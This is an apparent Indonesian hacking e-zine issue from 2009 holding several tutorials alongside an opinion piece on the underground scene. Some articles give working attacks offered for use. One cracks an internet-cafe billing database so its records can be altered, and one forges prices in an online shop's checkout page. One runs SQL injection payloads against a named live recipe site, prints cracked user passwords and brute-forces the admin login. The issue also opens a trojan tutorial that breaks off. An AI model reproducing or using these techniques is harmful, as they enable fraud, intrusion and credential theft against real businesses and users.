Hacking Billing Explorer – Hal 9 Remote

- 6-

HC eMagazine Magazine – – Spirit # 02

» Opini Pembaca Tamatkah Dunia Underground Indonesia..? Present By : Omicron9194 Sedikit Omicron mengambil kutipan dari idsecconf 2008 kemarin mengenai nasib dunia underground Indonesia. How ? Sejenak kita renungkan dunia underground Indonesia.Dunia yang melahirkan para jagoan dunia maya khususnya di bidang keamanan cyber , sekarang ini dalam kondisi tidak menentu.Keprihatinan ini terjadi di seluruh belahan dunia yang di perjelas oleh Duvel dengan artikel A brief history of the Underground scene . Mungkin agak sedikit ekstrim atau mungkin sangat ekstrim dengan judul seperti itu. Tapi inilah kenyataannya. Dunia Underground Indonesia sekarang ini sedang mengalami degradasi yang cukup serius. Keprihatinan yang mendalam adalah kemunculan generasi-generasi yang lebih berorientasi kepada materi dan publikasi dibanding dengan kemurnian berorganisasi,berdiskusi dan berbagi ilmu pengetahuan. Ditandai dengan semakin sepinya dunia IRC yang merupakan salah satu tempat diskusi dunia maya, serta conference yang semakin nge- junk junk jauh dari materi pembelajaran. Seiring perkembangan waktu,juga timbul regenerasi baru di dunia cyber. Tetapi coba kita lihat pendatang baru sekarang. Mereka terlalu manja, tidak mau berusaha keras dan gampang menyerah. Sejak adanya google pada tahun 2003 yang belum ditemukan sebelumnya. Serta banyak lagi tutor-tutor bahasa Indonesia yang “berserakan” di dunia maya.

Kemunduran dunia underground juga di perlihatkan dengan adanya aksi pen-deface-an situs dalam negeri. Akhir-akhir ini kian marak aksi deface negeri sendiri. Tidak tahu motif apa sebenarnya dari aksi deface tersebut. Yang sangat memalukan sekaligus memilukan adalah mereka yang meninggalkan jejak setelah beraksi. Inikah dunia underground Indonesia sekarang ? Mungkin ini lah yang Omicron sampaikan. Regenerasi di dunia cyber sekarang hanyalah berorientasi kepada materi dan publikasi saja. Ya,tidak lain adalah mereka yang hanya untuk mencari ketenaran belaka. Akhir-akhir ini sering sekali kita lihat aksi deface, tidak tahu itu teman atau lawan. Forum Cyberdos.org misalnya, 21 Mei 2009 kemarin forum itu di deface oleh sesama teman dunia bawah tanah. Apa yang menyebabkan aksi itu ? Ya, jawabannya hanyalah ke-egoisan yang mempunyai ilmu.

Hackers-Center Hackers- Center © 2009 – HC eMagazine Vol. 02

- 7-


Mereka merasa dirinya lah yang lebih dari semuanya.Maksud dan tujuannya pun tidak jelas.Mereka hanyalah seorang kiddies bahkan lebih rendah dari itu! Inikah salah satu yang menyebabkan kemunduran dunia underground di Indonesia ? Mungkin iya.Mereka para defacer lupa akan siapa yang telah mengajarinya,yang telah membuat mereka menjadi “begini” , lupa bahwa dia dahulu siapa,dan sekarang mereka telah bisa berbuat apa.Mereka seakan kacang lupa

pada kulitnya. Dunia underground Indonesia sekarang tidak seperti dulu lagi.Seiring perkembangan waktu dan teknologi telah melahirkan orang-orang penting di dunia cyber. Haruskah kita juga menjadi kiddies? Ataukah kita mematuhi etika yang ada ? |omicron9194|

Redaksi HC eMagazine menyediakan halaman khusus untuk opini yang dibuat oleh penulis Setia HC

eMagazine Vol 1 dan 2 yaitu omicron9194 sebagai apresiasi terhadap perkembangan dunia underground indonesia. Terimakasih atas partisipasinya. Berikut ini adalah Biodata penulis : --Specification

A.k.a

: omicron9194

Age

: Nineteen

Origin

: Bengkulu, Indonesia

Location

: Bandung, Indonesia http://d1gdo.com http://omicron9194.nnce.web.id

Interest

: Hacking 'n Security Programming Programming 'n Networking Algorithm 'n Artificial Intelligence

Work

: University Student

Computers

: # "Wizz4rd" AMD Sempron 3000 , 512MB, 2 HDD 80 GB + 20GB, with XP Prof Ops Sys # "Aurencia a.k.a Felt" Asus F3E Core2Duo , 1.5GB , 120GB , with XP Prof , Ubuntu Intrepid Ibex Ops Sys

Member of

: Echo , NNCE Team! , Hackers-Center

--Favorite


- 8-


Food

: Sambel buatan Ibu , Lenggang , Bakso , MpekMpek MpekMpek , Lontong , Mie Ayam , Nasi Goreng , Rujak

Drink

: H2O , Susu , Es Jeruk

Movies

: Action , Imagination

Books

: AlQuran , All About Islamic , All About Information of Technology

Game

: I'm not Gamer

--Quote

"Hasbunallah wani'mal waqiill..." --I want to be...

Elite Hacker... --Shoutz 'n Greetz

# Allah SWT # Rasulullah SAW 'n My Lovely Family # |NNCE Staff | : Lintah_Cyber,Cyber*Z_Camel,Romeo,Gembel_cyber,Goblin,TripleZix # Echo,NNCE Team!,Hackers-Center,All Underground Community # xpyrcker , ketek , unsuprise , Juniorsev3n , k3m4n9i , vYc0d , ciebal , ch1km0nk , etc .... # My Friends, I'm nothing without you


- 9-


Hacking Billing Explorer Hacking Billing Explorer Database All Version Writer : Coco_nk4l ([email protected] [email protected])) Kalian pasti dah gak asing lagi dengan namanya Billing explorer, Billing yg kebanyakan di gunakan oleh para pemilik warnet, Billing Ini mampu menyimpan semua hasil transaksi dan semua konfigurasinya di sebuah file yang berekstensikan berekstensikan *.008 ( 008 file ) nah mungkin gak gw doank yg punya fikiran file ini sebenernya file apaan c??? ternyata setelah di obok2 file tersebut adalah File database yg diubah ekstensi aslinya mnjadi *.008. disini gw bakalan coba kasih tau gimana cara bacanya tapi jangan punya harapan untuk bisa membaca password Admin dolo karena gw lom sempat nemuin cara tersebut, Trik ini mungkin sangat berharga buat para Operator warnet yg menggunakan Billing ini dan ingin melakukan sedikit kecurangan tetapi tidak di beri tau password admin pada billing (Seperti yg di alami Kakak gw ). ). Oke gw kira cukup basa-basi kita . Yang musti loe lakuin adalah buka lokasi dimana software billing di install contoh : “D: \Billing\Billing \Billing\Billing explorer\ explorer\” Lihat disana bakal ada file ber ekstensi *.008

Disana loe bakal nemuin file bernama bill01.008 (lihat tanda panah) sebelumnya copy dulu file tersebut untuk menghindari hal yang gak di inginkan lalu ubah ekstensi dari bill01.008 menjadi bill01.mdb setelah di ubah ekstensinya coba loe buka file tersebut apakah bisa di buka??


- 10-


Ternyata File bill01.mdb di lock untuk bisa membukanya, pake Advance Office Password Recovery ( Silahkan kalian googling ) kalo udah silahkan di crack password dari File bil01.mdb dan yang akan kita dapetin sepert gambar dibawah ini

Pada gambar diatas terlihat password file ternyata berantakan masih berupa code2 yg aneh, tapi gak usah takut yg kita butuhin hanya password itu untuk membuka dan mengedit file tersebut jadi copy aja


- 11-


passwordnya dgan click icon 2 kertas di samping password dan masukan password ketika di minta untuk memasukan password pada saat kita buka file bill01.mdb, setalh itu coba op en database…dan masuk pada table2 yang sekiranya ingin kalian ubah,

Setelah selese di edit save kembali dan kembalikan format ke semula menjadi bill01.008 dan gantikan file asli dengan file hasil editan kita . Catatan : Pada saat menggantikan file bill01.008 yg asli dengan file hasil editan kita, pastikan billing server dalam keadaan non aktif.

Salam

Coco A.K.A Nk4l

Hackers-Center

Balikita

Yogyafree

HD Team

| UnderDos | MetroPolix | R00t | Niko A.K.A Biadabz | AK-47 AK-47|| GT-5 GT-5|| |inc0mp13te | X-shadow | Jeje | Ramz | Agitama | Gorontalo Defacer | | Indonesi Indonesian an Coder | Cukdu$ Crew | Tuban Hackerlink | Deantique | Hackers-Center Hackers- Center © 2009 – HC eMagazine Vol. 02

- 12-


IP Forwading Setting IP Public Writer : kecoaqu ([email protected] [email protected])) Langsung aje ya…

Pengertian IP Publik itu adalah IP yang dikenali di internet. Jumlahnya sangat terbatas. Kemarin gw mencoba membuka Ip porwading untuk membuka ip public yang di tutup oleh sebuah providerny, gunanya membuka itu gw maksudkan untuk supaya IP tersebut dapat diakses dari luar kantor dan juga kebutuhan system gw juga yang dibuat oleh kantor gw supaya dapat diakses dari luar kantor. Sebenarnya sangat riskan klo IP itu di buka karena dangan sangat mudah jika seorang Hack yang tau, walau pun harus menembus beberapa pengaman dulu. (padahal gw juga ga tau caranya gmn, xixixi) Langsung aje yach disini gw menggunakan Prolink Prolink berhubung jebol kena petir jadi gw ganti lagi pake Aztech !!! 1. kalian bisa buka internet lalu masuk ke get wa y provider yang dipakai…disini gw pakai speedy http://192.168.1.1.. lalu login sesuai dengan yang diberikan oleh bawaan modem, itu juga klo belum http://192.168.1.1 diganti.

2. jika sudah berhasil kalian bisa cari menu Port Forwading


- 13-


3. Jika sudah terbuka menu Port Forwading. Kalian pilih Category – User – tambahkan New rules sesuai kebutuhan kalian disini kebutuhan saya untuk SQL server lalu di Add. Lalu pastikan LAN IP sudah dipastikan dipastikan hanya computer computer itu yang bisa diakses oleh kita kita nantinya biasanya itu sebuah server.

Belum sampai disitu kalian juga harus setting bagian Custom Port Forwading.


- 14-


Dimenu ini ada setting sesuai IP Compie yang ingin di akses dan juga PORT berapa yang ingin dibuka. Klo gw memakai SQL SERVER 2000 tetepi harus di Upgrade dulu menjadi SP4 karna PORT yang gw pakai tidak support dengan SQL SERVER 2000 standrat. Klo sudah selesai lalu submit. 4. jika sudah selesai Save Setting lalu Resset & Rebot. Klo mau tes berhasil atau tidak bisa di tes Di alamat Http://canyouseeme.com Gampang kan ( padahal mumet banget gw settingnya ) apalagi ga semua modem yang support dengan Port Forwading.... gw berhasil juga karena hasil sharing dengan Under-Dos, Password sama Root…!!! Sory klo ga begitu jelas menjelaskannya dan masih banyak kesalahan-kesalahan…. Thank’s

Kecoaqu / Arul [email protected]


- 15-


Trik Mencurangi Toko Online Trik Mencurangi Toko Online Writer : Tenro Pertama-tama gw makasih banget sama momod, contributor dll HC yang udah mau nerbitin artikel pertama w, he...he..;-).Muph sebelumnya kalo artikel gw cupu, artikel ini gw bikin atas dasar kemampuan ekonomi ekonomi keluarga gw yang belum bersedia ngebeliin gw laptop hiks...hiks ;-(. Semoga setelah gw bikin artikel ni ada donatur yang bersedia ngebeliin w laptop l aptop he..he..he... (ngarep). Segitu ajah basa-basinya nti malah jadi basi lagi. Gw mau share ma kalian tentang trik cara mencurangi toko online dengan merubah harganya, kalini kita gag perlu nyari-nyari tuch kutu di web yang jelas-jelas itu akan makan waktu n ribet (menurut gw) n yang lum bisa carding (kaya gw) ni alternatif laen, tapi pengetik tidak bertanggung jawab yah... JUST 4 LEARN. Mari kita mulai operasinya.... operasinya.... Preparation: 1. kompi pastinya (kalo bisa n di anjurkan bisa akses inet i net jadi gag ribet) 2. notepad or frontpage (sekedar saran mending make frontpage) 3. lagu-lagunya kungpow (WAJIB) 4. cemilan (di anjurkan beli keripik singkong) dah segitu aja persiapan nya, sedikit kan..... k an..... oh iya lupa sebelom mulai pastikan anda ke kamar kecil dulu biar gag ribet nantinya..... nantinya..... Mulai triknya.... 1. kita cari target kita di tong sampah kalo gag ketemu kita tanya google. Karena w lagi pengen laptop maka keyword w “laptop”.... Wew w dapet banyak bgt, tapi w Cuma milih satu ajah yaitu:


- 16-


Yah ketauan w sering buka FB he...he...he... 2. kalo udah nemu, kita amati web itu dolo. Q: apa yang di amati???? A: pertanyaan bagus, yang kita amati bagaimana cara kita ki ta order laptop itu. Udah belom??? Jangan lama-lama... 3. kalo udah mari kita cari mana yang mw kita order,

trus kita pura-pura order barangnya,


- 17-


pas di checkout ternyata dia minta kita harus jadi member n ngasih data-data kita.

wah gawat..., untung punya banyak koleksi e-mail+no Hp+alamat jadi selamat. So ikuti aja maunya..... 4. mulai dari sini w saranin kalian make kaca mata deh or cuci muka cos bakal pegel bgt (kalo yang belum terbiasa kaya w). Kita ambil source code-nya saat kita udah login soalnya kalo belom login kita akan semakin ribet. Trus save dengan ekstensi *.html. w ngambil source codenya pas disini


- 18-


5. nah abis itu kita jalanin source code itu dari HD kita. Saran mending make frontpage biar keliatan visualisasinya (bagi yang belum terbiasa liat coding). Tapi karena w gag punya n males download w make notpad ajah. Kita amati codenya+terjemah codenya+terjemah kan n w dapet hal yang keren class=linkmenu>Netbook Netbook Asus Eee PC 1000HE 1000HE Rp 7,740,000.00 Rp 7,740,000.00 Total align=right>Total Rupiah:7,740,000.00 align=right>7,740,000.00

Kode di atas merupakan data dari barang yang kita order


- 19-


Ket: Pink: nama barang yang kita order, Merah: harganya

"> "> ">

Kode di atas adalah perintah untuk memanggil script Ket: Biru: kata-kata yang ada di kotak, Hijau: script yang di panggil ketika kita mengklik kata-kata warna biru Nah itu kode yang paling penting, sekarang tinggal edit ajah, edit yang warna merah dengan harga yang anda inginkan, tapi masih ada masalah kalo kita klik “check out” kok malah error, kenapa hayo????

INGAT kalo kita ngeklik tulisan warna biru tanpa sadar kita memanggil tulisan warna Hijau, jadi kita juga harus ngedit yang Hijau cara ngeditnya kita cari javascriptnya “gobayar”. Setelah dicari akhirnya dapet function gobayar() { document.f1.action = "shoppingcartout.php " shoppingcartout.php"; "; document.f1.submit();
>

itu dia codingnya. Sekarang di apain??? Sekarang ganti tulisan yang warnanya orange. Ganti make apa???? Emang itulisan itu artinya apa? ?? Tulisan itu artinya, kalo kita klik tulisan yang warnanya biru tadi maka kita akan pergi ke halaman itu, nah gantinya kita harus ganti jadi http://target.com/page yang dituju selanjutnya.php (itu di ambil dari URL kalo kita ngeklik “check out”)


- 20-


6. Kalo udah di edit semua jadinya begini codingnya function gobayar() { document.f1.action = "http://target.com/shipping.php " http://target.com/shipping.php"; "; document.f1.submit(); } >

Keranjang class="home-judul">Keranjang Belanja

width=25> No > div>


- 21-


Subtotal >

No Item
QtyQty

Price align="right">Price

Subtotal

1 Netbook class=linkmenu>Netbook Asus Eee PC S101H Rp 1,000.00 Rp 1,000.00

Total align=right>Total Rupiah: 1,000.00 align=right>1,000.00

()"> bali()"> ar()">

7. lalu save pekarjaan anda trus tinggal di jalankan lagi pada HD anda Maka jadinya akan begini


- 22-


Liat yang di lingkarin harganya udah sesuai dengan yang kita inginkankan???? Trus pas kita klik check out maka tulisan itu akan membawa kita pergi ke web yang sesungguhnya..... sesungguhnya.....


- 23-


Selesai dah.... Gimana gampang kan???? Kalo ada pertanyaan kita bahas di forum okeh.... Sikian dulu ah, ngantuk.... /nick: Tenro /lokasi: dari UKI naek 56 turun di cileungsi nah dari situ telpon eightTailz ajah minta di anterin ke rumah w. /YM: Rizal hakuya /web: tinggal nyewa domain doang /avatar: i dont have avatar (entah mengapa w gag bisa make avatar)

Thx to:-ALLAH to:-ALLAH SWT yg udah ngasih w kesempatan buat hidup -My parents yg udah berjasa bgt bagi w -Ade w Alif yang ngajarin w coding n maen kompi -My lovely Azizah yang selalu nyemangatin w -EightTailz yang udah menjerumus kan w ke dunia Hacking -S’to thx 4 u’r artikel -All undergruond forum -My milist [email protected] [email protected](tapi (tapi lagi fakum sebagian besar membernya lagi ngerjain PLO, semangat guys) -My friends phantom aka toke aka Chaer newbie, em32, R 324 fm, Iis aka Via, om Galih, Om kiwil, Om dwi n all yang gag bisa w sebutin satu-satu -

-My comp Intel celeron, HDD 20GB, RAM DDR1 128+256, Mobo Asus, OS win7 (jangan ditiru orang bodoh ini) -Warnet yang selalu w jahilin muph gag sengaja bis BT w


- 24-


YM Invisible Checker Cek Status YM Writer : Cybernet ([email protected] )

Ym adalah sarana chating yang mendunia zaman

tapi tidak kelihatan, sedang Online memang sedang tidak Online xixixixixixixi .. ..

sekarang ini . Di app Ym kita bisa Chat,Kirim File Terima

Next ……………………..

File,Berwebcam ria,Sharing sesame umat. hehehehe ….dll .

Hhhmmmmmppp .. .. .. Sssssssstttt !! ada sebuah website nih yang biasa digunakan untuk mengecek status Ym.hehehehe .

Kadang – kadang sebagian ID teman di Ym kita mengganti status dengan Invies sehingga kita tidak bisa melihat dia oL or ga.”jadi bijimana kita bisa liat dia Online tapi invie s atau bener² ga Online”??

Langkah² nya sebagai berikut : 1.Buka Web http://Vizgin.com

Tampilan Utama

Tenang ada Cara mudah untuk memecahkannya .hehehe ..

Gambar dibawah .

Gambar diatas adalah status² pada Ym dan juga kita bisa buat sendiri.pasti udah pada taukan apa maksud gambar di atas.hehehe . . .

2.Terus Masukin Id dari YM yang ingin kita ketahui statusnya,Contoh statusnya,Contoh : ingin mengetahui mengetahui id YM : Kutang_hansip sedang offline ataukah invisible, seperti gambar di bawah :

Nah ada status yg sangat mengesalkan. hehe .” Invisible to Everyone”menunjukan Everyone”menunjukan seseorang sedang

Online tetapi tidak terlihat Online oleh kita . Status Invisible hampir hampir sama dengan dengan status Offline. Offline. Hanya bedanya invisible itu user online


- 25-


Silahkan masukin Id YM baru secara langsung dan kita bisa lihat setatus dari YM yang kita inginkan sangat mudah dan simple.hehehe…… sim ple.hehehe…………… ………

Masih banyak tips dan trik tentang Computer yang lebih manjuuuuurr ..Selamat .. Selamat mencoba ………..

Pendamping : Mas.trisnowlaharwetan Sesudah masukin Id YM seperti gambar di atas kemudian tekan Enter pada keyboard tunggu beberapa detik maka akan kita ketahui status dari Id Kutang_Hansip .hehehe si Agi susah bgt disuruh invies jadinya :

Thx to : @ Agitama @ trisnowlaharwetan @ Hackers – Center.org @ Spyrozone.net

/ Nick : Cybernet /Location : BandungCilacap Ternyata si Agi Online. nah itu status Id YM yg Online Seperti gambar di atas . Tuh Gi loe dah exis di artikel + senyuman loe yang MANIS.xixixixii Seperti Gambar di bawah lah Status yang Invies tapi si Cybernet lagi Online :


/Email : [email protected]

- 26-


Remote SQL Injection Exploit SQL Injection pada PHPRecipeBook 2.39 Writer : Necklord ([email protected]) Nah, pada kesempatan kali ini gw mau membahas salah satu kelemahan yang populer di dunia hacking, yaitu SQL Injection. Kali ini target kita adalah PHPRecipeBook versi 2.39. PHPRecipebook adalah script php opensource untuk menejemen resep makanan. Kamu bisa download http://sourceforge.net/projects/phprecipebook/ , gratis n’ open source .

script

ini

di:

Ok, let’s begin.

Disarankan mencoba di localhost, atau jika ingin mempraktikan sebaiknya menggunakan proxy. Untuk gw sendiri, gw lebih suka nyoba langsung dari pada di localhost , karena itu, mari kita cari targetnya dulu, pastinya lewat gooogle.

inurl:"/index.php?m=" m=" "PHPRecipeBook 2.39" Gunakan syntax: inurl:"/index.php?

Gambar 1. Hasil Pencarian di Google

Waduh … ternyata hasil pencarian menghasilkan banyak sekali situs, pilih yang mana nih…. Gw lihat satu satu,

rupanya ada situs yang membuat gw menjadi tertarik, yaitu www.lowcarbohydratefoods.net . Ok, kalau begitu gw langsung menuju ke TKP. Hackers-Center Hackers- Center © 2009 – HC eMagazine Vol. 02

- 27-


Gambar 2. Waduh, langsung muncul resep

Wah, baru di klik aja langsung muncul resep, ckckckck. Yaudah langsung aja kita mulai injeksinya. Kelemahan terdapat pada file index.php, terutama pada bagian index.php?m=recipes&a=search&search=yes&course_id=[Nah Disini]

search.

Yaitu:

Bagian nah disini yang diberi warna merah bisa diisi oleh code code seperti:

-7+union+select+1,user_login,3,4, -7+union+select+1 ,user_login,3,4,5,6,7+from+securi 5,6,7+from+security_users ty_users — Jika Kode diatas dimasukan, maka akan muncul daftar username yang terdapat pada situs tersebut, nah untuk mengetahui passwordnya cukup ganti user_login menjadi user_password (Sesuai dengan table security_users) menjadi seperti ini:

-7+union+select+1,user_password,3 -7+union+select+1 ,user_password,3,4,5,6,7+from+sec ,4,5,6,7+from+security_users urity_users — Nah ini daftar username yang ada:


- 28-


Gambar 3. Usernamenya banyak bangetz!

Wah, lihat usernamenya banyak bangetzzz… Ditengah tengah ada username admin tuh, itu sasaran kita . Nah, sekarang coba kita cari tahu passwordnya.

Gambar 4. Waduh, ga gampang lho!!!

Waduh RUPANYA PASSWORDNYA SEGUDANG!!! Di DECODE LAGI!!! Kita harus mencari tahu password si admin, hmmm…. Tadi kalo gw hitung admin berada di urutan ke 11, tapi ini tidak menjamin bahwa passwordnya juga berada di urutan ke 11. Jadi secara untung untungan, gw coba password ke 11.


- 29-


Untuk menggunakan password itu, kita membutuhan membutuhan sebuah md5 decrypter untuk men decrypt md5 hash passwordnya. Gw pake tools yang disediain oleh kerinci.net yang bisa diakses di http://tools.kerinci.net/?x=md5 .

Gambar 5. Beruntung! Md5 hash ditemukan!

Setelah hash ditemukan, munculah angka 8624266 sebagai hasilnya, lalu langsung saja gw coba.

Gambar 6. Gagal!

Wah, rupanya gagal, tapi gw memutuskan untuk tidak menyerah!!! Bagaimana jika dicoba secara masal?? Ok, gw akan coba. Gw mencoba dengan 48 password hash dari pertama.

Gambar 7. Tidak semuanya berjalan dengan mulus!

Tidak semuanya berjalan dengan mulus, rupanya ada beberapa password yang tidak ditemukan oleh tool tsb, jadi gw gunakan saja yang ada.


- 30-


e3ceb5881a0a1fdaad01296d7554868d 8f9b97bf3fad640ca17e9627e6bba1fd 8f9b97bf3fad640ca17e9627e6b ba1fd ba9e42353a9b49c10c44f4bc7aa6e867 ba9e42353a9b49c10c44f4bc7aa 6e867 e389cb43132a236f3c11e96d4557a28e e389cb43132a236f3c11e96d455 7a28e f0f02c8573be5de9dd53c49f3cd28656 f0f02c8573be5de9dd53c49f3cd 28656 0826b5c04738bedcc5ebc17dc643e103 0826b5c04738bedcc5ebc17dc64 3e103 c592daf85aec99bd8f855e0299d0c88c c592daf85aec99bd8f855e0299d0c88 c e9646d086a37906e5bec4323d3b37c9b e9646d086a37906e5bec4323d3b 37c9b 3b73acb1ede1b4503409735604e6eb1a 3b73acb1ede1b4503409735604e 6eb1a c5e29022e24ef7195fe60ee03f86d637 c5e29022e24ef7195fe60ee03f8 6d637 361b259045c200a88bbcb3028a4115ff 361b259045c200a88bbcb3028a4 115ff 629eeeebb23c16e7ebd4ccfe6456aae2 629eeeebb23c16e7ebd4ccfe645 6aae2 0d107d09f5bbe40cade3de5c71e9e9b7 0d107d09f5bbe40cade3de5c71e 9e9b7 587915d98237ac0c8ac6da2f27343424 587915d98237ac0c8ac6da2f273 43424 e311dd5fd4cdbba780ea0d0062df7788 e311dd5fd4cdbba780ea0d0062d f7788 21d9c57c1d2ae58cf12ece8a3470666b 21d9c57c1d2ae58cf12ece8a347 0666b 7d0df4f46505d83bc7949dd1fb9c0db8 7d0df4f46505d83bc7949dd1fb9 c0db8 0894398a6221a5138e48c4707c817b8a 0894398a6221a5138e48c4707c8 17b8a 60a8d9553442e861617b0e581768f651 60a8d9553442e861617b0e58176 8f651 8ee44d70bdc5f84c63804496ba66e333 8ee44d70bdc5f84c63804496ba6 6e333 e892f70829c1f7412842cd5d659cad4b e892f70829c1f7412842cd5d659 cad4b 544720e1554ad7ec7c4931378d794751 544720e1554ad7ec7c4931378d7 94751 c2800c7f1ccbe43bafdde1bf66c71209 c2800c7f1ccbe43bafdde1bf66c 71209 a541714a17804ac281e6ddda5b707952 1e9c32b7ba6fefa76773d5c79bcdaad0 1e9c32b7ba6fefa76773d5c79bc daad0 1613f36d06342303f69469f5a1b29c21 1613f36d06342303f69469f5a1b 29c21 fccf8b614092514a952436581857679d fccf8b614092514a95243658185 7679d 8db420479ffde71f56d59acbd23c3bf2 8db420479ffde71f56d59acbd23 c3bf2 81150c20187cd1e88948445ff5e57cb5 81150c20187cd1e88948445ff5e 57cb5 aa1a7b903e4d011ce332c921c53c2708 aa1a7b903e4d011ce332c921c53c270 8 d8ae5776067290c4712fa454006c8ec6 d8ae5776067290c4712fa454006 c8ec6 d3448803ba80ae9f938ba4a5b940cc07 d3448803ba80ae9f938ba4a5b94 0cc07 9cc939576d2f1dd7ec227996742c9664 9cc939576d2f1dd7ec227996742 c9664 34f76d9adcbabd514b5a9824b2197421 34f76d9adcbabd514b5a9824b21 97421 a9fced156f931f6f5cfdcdd7ffd74127 a9fced156f931f6f5cfdcdd7ffd 74127 b8b2926bd27d4307569ad119b6025f94 b8b2926bd27d4307569ad119b60 25f94

[ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [ [

222222 ] michael1 ] nascar ] cullen ] kelsey ] erica ] b ooloo ] snoopy ] kruiden ] 8624266 ] anaforlife ] 228233 ] letmein ] 1023jo ] christina ] ophelia ] bailey ] ribber ] domino ] john1953 ] jimmys ] 091302 ] blwalk ] wisdom ] russell ] james1 ] 031972 ] sacsbc ] iluvthom ] h eidiboo ] samuel ] RAPHAEL1 ] qaz2wsx ] edmonton ] gurli6 ] 9676 ]

Baiklah, gw mulai mencobanya. Tapi dengan bantuan brutus… 


- 31-


Gambar 8. Brutus yang sudah diconfigurasi

Dan, setelah menunggu beberapa lama, ahkirnya …. Usaha yang dilaksanakan secara sungguh sungguh pasti

membuahkan hasil, akhirnya gw berhasil login!!

Gambar 9. Usaha yang tidak sia sia.


- 32-


Gambar 10. Bisa langsung tambah resep



Jadi, jangan takut untuk mencoba!! Author Email

: :

Nick at Forum : Thanks to

:

Necklord

[email protected] Administrator - God - All of HC Staff & Members Members - HC eMagazine Team - Readers …


- 33-


Add Ons Mozilla Made Easy Cara Mudah dan Cepat Membuat Toolbar Browser Writer : ciebal ([email protected] [email protected])) Setelah ciebal membuat Toolbar Hackers-Center untuk Mozilla n IE yang telah dipublish dan gunakan oleh para member HC, kini ciebal akan sedikit membahas cara pembuatan toolbar dengan mudah tanpa keahlian khusus dan semoga ini bisa menjawab pertanyaan-pertanyaan para member yang bertanya tentang cara pembuatannya pembuatannya sehingga ada yang menganggap ciebal JAGO. Setelah membaca membaca artikel ini pasti anggapan bahwa ciebal JAGO akan pergi jauh-jauh dari pikiran kamu. Xixixixi.. Sebetulnya ada banyak software khusus untuk membuat Add Ons Mozilla tapi kali ini ciebal akan mencoba membahas dengan bantuan Online Service pada conduit.com untuk proses pembuatannya. Sebetulnya Add Ons Mozilla yang ber-ekstensi .xpi merupakan kumpulan file-file atau ekstensi untuk mengkompress file seperti .zip atau .rar. Silahkan kamu coba ganti ektensi .xpi dengan .zip lalu buka file tersebut dan apa yang kamu lihat..? Yah hanya sekumpulan file-file file-fi le yang telah di kompress.  Ok deh, sekarang kita mulai untuk membuat ToolBar pribadi untuk website/blog sendiri, komunitas, dll. Sekarang ikuti langkah berikut ini : 1. Buka situs www.conduit.com dan lakukan registrasi seperti biasa dan isikan data peribadi kamu

2. Setalah proses registrasi selesai, kamu akan menerima email dari conduit.com dan silahkan login. 3. Setelah login, untuk pertama kalinya kamu akan melihat wizard sebagai panduan untuk menggunakan layanan ini. Tekan Start untuk memulai penggunaan. 


- 34-


4. Kamu akan dibawa pada cpanel account kamu, dan pasti kamu juga sudah mulai terbayang bagaimana cara menggunakannya.. :D

Segitu aja..? Emang Cuma segitu kok, sekarang kamu tinggal membuat toolbar kamu agar lebih cantik dilihat..  Disini ciebal Cuma sedikit s edikit membahas tentang bagian-bagian pentingnya aja yah.. Sekarang kita coba edit sedikit toolbar kita ini sehingga menjadi lebih caktik untuk di gunakan di firefox atau IE kita.. 


- 35-


1. Edit Logo Untuk mengedit logo cukup dengan mengklik pada live preview toolbar kita lalu pilih edit, dan akan tampil seperti ini : (Silahkan (S ilahkan edit sesuka kamu)

2. Menambah content ToolBar Sekarang adalah proses pembuatan isi dari toolbar kamu, kamu bisa menambahkan link, radio, email notifier, serta aplikasi lainnya. la innya.

3. Silahkan berexplorasi lebih dalam untuk mempercantik ToolBar kamu.. k amu.. 


- 36-


Yang istimewa pada layanan ini adalah kamu tidak perlu pusing-pusing menyediakan hosting dan domain untuk menyimpang toolbar kamu. Contohnya HC memiliki domain untuk toolbar sendiri yaitu www.hackers-center.ourtoolbar.com pada bagian ini ciebal membuat domain dengan nama www.ciebal.ourtoolbar.com sebetulnya masih banyak lagi domain yang bisa kamu gunakan anda tinggal setting saja. 

Kamu juga bisa mendapatkan dolar dari toolbar ini, karena setiap ada orang yang menginstall ToolBar yang kamu buat kamu akan mendapatkan 0.1 Dolar (kalau gak salah).

Lumayan kan..? selain mendapatkan dolar kamu juga jadi bisa melihat trafik pengguna ToolBar buatan kamu, statistik diatas adalah hasil dari ToolBar HC yang di ambil screeshotnya pada tanggal 10 Juni 2009.


- 37-


OK, sekian dulu tutorial singkat dari ciebal. Mohon maaf karena aktikel ciebal ini t idak ada hubungannya hubungannya dengan hacking karena ciebal emang gak bisa klo soal Hacking-Hackingan. Xixixixxi.. Semoga bermanfaat, klo kurang jelas bisa menghubungi saya via v ia email atau YM. Terimakasih.. 

/Nick at Forum : ciebal /Location : Banten - Bandung /Email : [email protected] or [email protected] /Web: www.ciebal.web.id | www.indoblogger.web.id /Thanks to :

Allah SWT, My Family, All Al l My Friends, HC Staff, Indoblogger Community, omicron9194, eminem, Paluared JS, Blackpaper, B lackpaper, Quatum.Byte, chuwey, kemangi, aris lesmana, xyberbreaker, All Reader, etc.. Tengkyu semuanya yang gak bisa disebutin satu-persatu.


- 38-


Trojan UnDetected AV Membuat Trojan Sederhana Writer : eminem (www.eminem.com www.eminem.com)) Trojan horse atau Kuda Troya , dalam keamanan komputer merujuk

kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Dapat disebut sebagai Trojan Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut: Trojan bersifat " stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash. Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya. me lakukannya. Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang ( background ), ), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse. Sumber 100% dari wikipedia 

Sekarang di sini saya mempunyai sebuah script dari bat yang gunanya untuk membuka port dan bisa untuk melakukan remote melewati telnet , sama hal nya seperti trojan  :


- 39-


